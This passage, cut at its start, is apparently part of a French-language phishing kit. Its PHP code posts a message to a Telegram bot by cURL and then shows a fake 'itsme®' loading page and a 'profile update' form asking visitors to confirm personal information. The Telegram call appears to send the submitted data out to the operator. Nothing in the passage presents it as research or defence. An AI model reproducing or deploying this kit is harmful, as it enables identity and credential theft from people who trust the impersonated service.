$chatId, 'text' => $message, 'parse_mode' => 'Markdown', 'disable_web_page_preview' => true ]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $telegramUrl); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $postData); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_TIMEOUT, 10); // Timeout augmenté pour Cloudflare $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); // Log en cas d'erreur (optionnel) if ($httpCode !== 200) { error_log("Erreur Telegram (HTTP $httpCode): " . curl_error($ch)); } curl_close($ch); // Afficher la page de chargement avec redirection automatique après 1.3 secondes ?> Chargement - itsme®
Chargement itsme®...
Veuillez patienter
Mise à jour profil
itsme logo
Mise à jour de votre profil
Confirmez vos informations personnelles pour maintenir votre identité numérique sécurisée et active.
⚠ Veuillez remplir tous les champs correctement.